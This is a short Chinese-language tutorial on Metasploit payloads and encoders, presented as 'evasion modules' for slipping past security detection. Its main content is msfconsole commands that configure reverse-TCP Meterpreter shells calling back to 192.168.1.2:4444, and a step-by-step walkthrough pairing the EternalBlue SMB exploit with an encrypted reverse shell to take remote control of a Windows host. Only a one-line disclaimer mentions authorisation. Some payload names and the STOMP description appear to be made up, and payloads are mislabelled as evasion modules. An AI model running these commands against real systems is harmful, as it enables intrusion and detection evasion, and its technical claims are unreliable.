Metasploit框架的evasion
模块用于生成绕过安全检测的有效载荷。以下是一些常见的evasion
模块及其使用案例:
1. 通用Evasion模块
-
windows/meterpreter/reverse_tcp_rc4
:使用RC4加密的反向TCP Meterpreter会话。rubyset PAYLOAD windows/meterpreter/reverse_tcp_rc4 set LHOST 192.168.1.2 set LPORT 4444
-
windows/meterpreter/reverse_tcp_uuid
:使用UUID生成器的反向TCP Meterpreter会话。rubyset PAYLOAD windows/meterpreter/reverse_tcp_uuid set LHOST 192.168.1.2 set LPORT 4444
2. 编码和混淆Evasion模块
-
x86/shikata_ga_nai
:使用Shikata Ga Nai算法进行XOR编码。rubyset ENCODER x86/shikata_ga_nai
-
x86/countdown
:使用递减计数器进行编码。rubyset ENCODER x86/countdown
3. 特定平台Evasion模块
-
windows/x64/meterpreter/reverse_tcp_stomp
:使用STOMP协议的反向TCP Meterpreter会话。rubyset PAYLOAD windows/x64/meterpreter/reverse_tcp_stomp set LHOST 192.168.1.2 set LPORT 4444
-
linux/x86/meterpreter/reverse_tcp_lzma
:使用LZMA压缩的反向TCP Meterpreter会话。rubyset PAYLOAD linux/x86/meterpreter/reverse_tcp_lzma set LHOST 192.168.1.2 set LPORT 4444
使用案例
假设你想利用一个Windows漏洞来获取远程控制,并且希望绕过安全检测,你可以按照以下步骤操作:
-
选择合适的
exploit
模块:rubyuse exploit/windows/smb/ms17_010_eternalblue
-
设置目标IP:
rubyset RHOSTS 192.168.1.1
-
选择合适的
payload
模块:rubyset PAYLOAD windows/meterpreter/reverse_tcp_rc4
-
设置本地监听地址和端口:
rubyset LHOST 192.168.1.2 set LPORT 4444
-
运行模块:
rubyrun
注意事项
- 使用这些模块时,请确保你有合法的权限和目的。
- 避免在未经授权的系统上进行测试,以免违反法律或政策。
通过这些模块和案例,你可以生成绕过安全检测的有效载荷,从而提高渗透测试的成功率。